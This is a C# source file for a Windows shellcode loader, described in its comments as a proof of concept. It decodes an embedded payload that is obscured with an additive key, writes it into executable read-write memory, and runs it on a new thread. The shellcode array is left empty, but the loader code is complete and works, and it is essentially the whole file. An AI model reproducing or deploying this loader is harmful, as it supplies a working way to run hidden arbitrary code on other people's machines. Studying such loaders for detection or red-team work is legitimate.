using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Runtime.InteropServices;
// Proof-of-concept shellcode loader: decodes an embedded byte array (simple additive
// encoding) into freshly allocated executable memory and runs it on a new thread via
// VirtualAlloc/CreateThread. Written quickly as a PoC, not to production standards.
namespace ConsoleApp1 {
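class Program
{
    // Win32 constants used by the VirtualAlloc / WaitForSingleObject calls below
    // (values as documented for the Win32 memory and synchronization APIs).
    private const uint MemCommitAndReserve = 0x3000;   // MEM_COMMIT | MEM_RESERVE
    private const uint PageExecuteReadWrite = 0x40;    // PAGE_EXECUTE_READWRITE (RWX)
    private const uint Infinite = 0xFFFFFFFF;          // INFINITE

    // Chunk size the original recursive copy used. It survives only because the
    // non-zero "position" argument of jawohl is defined as "offset by one chunk".
    private const int ChunkSize = 100;

    [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
    static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

    // SetLastError so a null handle can be reported with the real Win32 error code.
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

    [DllImport("kernel32.dll")]
    static extern IntPtr GetCurrentProcess();

    // Needed so the thread handle returned by CreateThread is released.
    [DllImport("kernel32.dll", SetLastError = true)]
    [return: MarshalAs(UnmanagedType.Bool)]
    static extern bool CloseHandle(IntPtr hObject);

    /// <summary>
    /// Reverses the encoding applied to the embedded payload: each output byte is
    /// (input byte - key) modulo 256. Only the low 8 bits of the key matter, so a
    /// key of 666 behaves exactly like 154.
    /// </summary>
    /// <param name="encoded">Encoded bytes; not modified.</param>
    /// <param name="key">Additive key that was used to encode the payload.</param>
    /// <returns>A new array of the same length holding the decoded bytes.</returns>
    /// <exception cref="ArgumentNullException"><paramref name="encoded"/> is null.</exception>
    internal static byte[] DecodeShellcode(byte[] encoded, int key)
    {
        if (encoded == null)
        {
            throw new ArgumentNullException("encoded");
        }

        byte[] decoded = new byte[encoded.Length];
        for (int i = 0; i < encoded.Length; i++)
        {
            // Subtract modulo 256; masking first keeps the narrowing cast valid
            // even if the assembly is compiled with /checked.
            decoded[i] = (byte)((encoded[i] - key) & 0xFF);
        }
        return decoded;
    }

    /// <summary>
    /// Decodes <paramref name="inputz"/> with <paramref name="key"/> and writes the
    /// result into unmanaged memory. The previous implementation recursed once per
    /// 100-byte chunk, producing one contiguous write; this version performs that
    /// contiguous write directly, so the stack depth no longer grows with the
    /// payload size.
    /// </summary>
    /// <param name="inputz">Encoded payload.</param>
    /// <param name="addr">Start of a writable region at least inputz.Length bytes long.</param>
    /// <param name="position">Legacy chunk flag: 0 writes at <paramref name="addr"/>;
    /// any other value writes at addr + 100, exactly as the recursive version did.</param>
    /// <param name="key">Additive key that was used to encode the payload.</param>
    /// <returns>The number of bytes written, i.e. inputz.Length.</returns>
    /// <exception cref="ArgumentNullException"><paramref name="inputz"/> is null.</exception>
    /// <exception cref="ArgumentException"><paramref name="addr"/> is IntPtr.Zero.</exception>
    private static int jawohl(byte[] inputz, IntPtr addr, int position, int key)
    {
        if (inputz == null)
        {
            throw new ArgumentNullException("inputz");
        }
        if (addr == IntPtr.Zero)
        {
            throw new ArgumentException("Destination address must not be null.", "addr");
        }

        IntPtr dest = position == 0 ? addr : IntPtr.Add(addr, ChunkSize);
        byte[] decoded = DecodeShellcode(inputz, key);
        if (decoded.Length > 0)
        {
            Marshal.Copy(decoded, 0, dest, decoded.Length);
        }
        return inputz.Length;
    }

    /// <summary>
    /// Entry point: allocates executable memory, decodes the embedded payload into
    /// it, runs it on a new thread and blocks until that thread finishes.
    /// </summary>
    /// <param name="args">Unused.</param>
    /// <exception cref="InvalidOperationException">VirtualAlloc or CreateThread failed.</exception>
    static void Main(string[] args)
    {
        byte[] buf = new byte[] { /* shellcode */ };
        int key = 666; // key used to encode the shellcode

        if (buf.Length == 0)
        {
            // VirtualAlloc rejects a zero size and CreateThread on a null start
            // address would crash the process; nothing useful can happen here.
            Console.Error.WriteLine("No shellcode embedded; nothing to run.");
            return;
        }

        // NOTE(review): the payload is written into memory that is already
        // executable (PAGE_EXECUTE_READWRITE). Allocating RW, copying, then
        // VirtualProtect to PAGE_EXECUTE_READ is the W^X-friendly form; kept as-is
        // here because this is a PoC.
        IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)buf.Length, MemCommitAndReserve, PageExecuteReadWrite);
        if (addr == IntPtr.Zero)
        {
            throw new InvalidOperationException("VirtualAlloc failed, Win32 error " + Marshal.GetLastWin32Error());
        }

        jawohl(buf, addr, 0, key);

        IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
        if (hThread == IntPtr.Zero)
        {
            // Previously a null handle fell through to WaitForSingleObject, which
            // just returned WAIT_FAILED and let the program exit silently.
            throw new InvalidOperationException("CreateThread failed, Win32 error " + Marshal.GetLastWin32Error());
        }

        try
        {
            WaitForSingleObject(hThread, Infinite); // wait for shellcode to finish execution
        }
        finally
        {
            CloseHandle(hThread);
        }
    }
}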
}